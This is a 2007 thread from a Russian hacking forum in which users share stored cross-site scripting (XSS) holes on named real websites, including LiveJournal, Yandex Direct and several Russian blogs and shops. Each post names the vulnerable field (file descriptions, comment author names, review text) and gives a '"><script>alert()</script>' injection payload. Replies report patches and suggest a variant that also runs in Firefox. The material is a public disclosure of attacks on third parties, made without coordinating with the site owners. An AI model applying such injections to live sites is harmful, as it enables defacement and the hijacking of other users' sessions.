HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Несколько активных хсс
  #1  
Старый 23.02.2007, 19:30
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию Несколько активных хсс

1) http://webfile.ru

Заливаем любой файл. И в "Описание файла: " вставляем нашу хсс, например:
Код:
"><script>alert("freddi")</script>
При переходе по ссылке с залитым файлом будет вылезать алерт.
Работает в ие и опере ))

2) http://www.livejournal.com

Здесь более кривая хсс.

Создаем новую запись, тема не важна.
а) Тип сообщения должен быть «HTML», вставляем в сообщение
Код:
"><script>alert("freddi")</script>
потом переходим на «Визуальный редактор», вылезает алерт, далее опять вставляем в сообщение
Код:
"><script>alert("freddi")</script>
нажимаем отправить в дневник, вылезает еще один алерт. При просмотре этой записи все норм, но если нажать редактировать то вылезет алерт.
б) Тип сообщения должен быть «HTML», вставляем в сообщение:
Код:
<p class="MsoNormal" style="MARGIN: 0cm 0cm 0pt"><span lang="EN-US" style="mso-ansi-language: EN-US"><font size="3"><font face="Times New Roman">12</font></font></span></p><script type="text/javascript">alert("freddi")</script>
сохраняем в журнал, далее при редактировании если перейти на «Визуальный редактор» вылезет алерт.

Работает только в ие.

Последний раз редактировалось freddi; 24.02.2007 в 15:53..
 

  #2  
Старый 24.02.2007, 16:35
Abra
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
С нами: 10866583

Репутация: 175
По умолчанию

Цитата:
Не понимаю смысла xss в lj
ну как же - в мое ЖЖ раньше посетителей приветствовал алерт мол "велкам ту май ЖЖ" =))))))
 

  #3  
Старый 24.02.2007, 22:46
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

Багу на blogs.mail.ru уже закрыли! все фильтруеться, а ведь не прошло и 8 часов, пипц!=(
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 

  #4  
Старый 25.02.2007, 19:44
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

4) http://direct.yandex.ru

Опять же кривая

Мои кампании->Настройки пользователя->Ваши ФИО

Код:
"><script>alert("freddi")</script>
теперь при просмотре «Настройки пользователя» вылезает алерт или при нажимании на «Дать объявление»
Но что-то это объявление не отправляется, тк там что-то с сервером, может в будущем это все выльется в нормальную активную хсс )))
 

  #5  
Старый 27.02.2007, 17:27
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

5) http://love.ru

Вот эта нормальная активная хсс

Добавляем коментарий в дневнике от анонимного пользователя. Вместо имени пишем:

Код:
"><script>alert("xss")</script>
Текст сообщения неважен.

Последний раз редактировалось freddi; 27.02.2007 в 17:31..
 

  #6  
Старый 28.02.2007, 23:17
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

http://blogs.tks.ru

Все тоже самое))
Оставляем комментарий от анонимного пользователя.
Вместо имени пишем:

Код:
"><script>alert("xss")</script>
Остальное неважно.

2 Constantine
Багу на майле не прикрыли, мож я тупо конечно объяснил, но все работает.

Последний раз редактировалось freddi; 28.02.2007 в 23:22..
 

  #7  
Старый 03.03.2007, 14:34
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

www.dvddom.ru

Добавляем отзыв о фильме. Уязвимо поле "Текст:"
Работает в ие и опере.
 

  #8  
Старый 06.03.2007, 22:51
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

www.mediaguide.ru

Уязвимо поле текст.



PS Моя последняя хсс, все больше не буду
 

  #9  
Старый 28.02.2007, 23:32
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

Обьяснил ты все нормально; сразу как только прочитал твою мессягу проверил- все работало, через пару часов перепроверил <> уже фильтровались.
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 

  #10  
Старый 01.03.2007, 00:03
Dronga
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
С нами: 10978946

Репутация: 714


Talking

Ребята, меня смешит)))) Вы имеете возможность вводить абсолютно нефильтруемые данные для проведения XSS атака, но при этом умудряетесь делать так, что ваши XSS работают _только_ под IE и Opera =)))
Цитата:
"><script>alert("freddi")</script>


При переходе по ссылке с залитым файлом будет вылезать алерт.
Работает в ие и опере ))
А ты попробуй сделать в следующий раз вот так:
Цитата:
"><script>alert("Antichat.ru");</script>
Мне почему-то кажется что так даже FF здасться
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ХСС на любом сайте freddi Болталка 3 27.02.2007 23:21
Несколько вопросов по IPB 2.0.4 Vilen Уязвимости CMS / форумов 1 01.07.2006 15:19
ХСС под Оперу, Ff. FHT Разное - Покупка, продажа, обмен 0 07.03.2006 21:06
Несколько дней болит голова...need help? Болталка 4 15.08.2002 19:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.